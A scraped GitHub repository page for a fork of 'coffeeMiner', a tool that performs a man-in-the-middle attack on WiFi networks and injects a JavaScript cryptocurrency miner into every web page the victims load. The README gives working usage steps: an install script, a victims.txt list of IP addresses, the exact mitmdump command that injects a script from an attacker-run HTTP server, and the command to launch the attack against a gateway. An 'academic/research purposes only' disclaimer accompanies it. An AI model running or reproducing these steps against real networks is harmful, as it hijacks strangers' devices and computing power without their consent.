Skip to content

MiTM attack to inject JS code in a public WiFi hotspot, initially to cryptocurrency

License

Notifications You must be signed in to change notification settings

bioverflow/InjectionPoint

This branch is up to date with arnaucube/coffeeMiner:master.

Folders and files

NameName
Last commit message
Last commit date

Latest commit

7a9270e · Jan 4, 2018

History

4 Commits
Dec 25, 2017
Dec 17, 2017
Jan 4, 2018
Jan 4, 2018
Jan 4, 2018
Jan 4, 2018
Jan 4, 2018
Dec 17, 2017
Jan 4, 2018
Jan 4, 2018
Jan 4, 2018
Dec 25, 2017

Repository files navigation

CoffeeMiner

Collaborative (mitm) cryptocurrency mining pool in wifi networks

Warning: this project is for academic/research purposes only.

A blog post about this project can be read here: http://arnaucode.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html

coffeeMiner

Concept

  • Performs a MITM attack to all selected victims
  • Injects a js script in all the HTML pages requested by the victims
  • The js script injected contains a cryptocurrency miner
  • All the devices victims connected to the Lan network, will be mining for the CoffeeMiner

Use

  • install.sh
bash install.sh
  • edit victims.txt with one IP per line
  • edit coffeeMiner.py, line 28, with the coffeeMiner httpserver IP:
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
  • execute coffeeMiner.py
python3 coffeeMiner.py ipgateway

network

A complete instructions for academic scenario can be found in https://github.com/arnaucode/coffeeMiner/blob/master/virtualbox_scenario_instructions.md

demo

About

MiTM attack to inject JS code in a public WiFi hotspot, initially to cryptocurrency

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 88.9%
  • Shell 8.0%
  • JavaScript 3.1%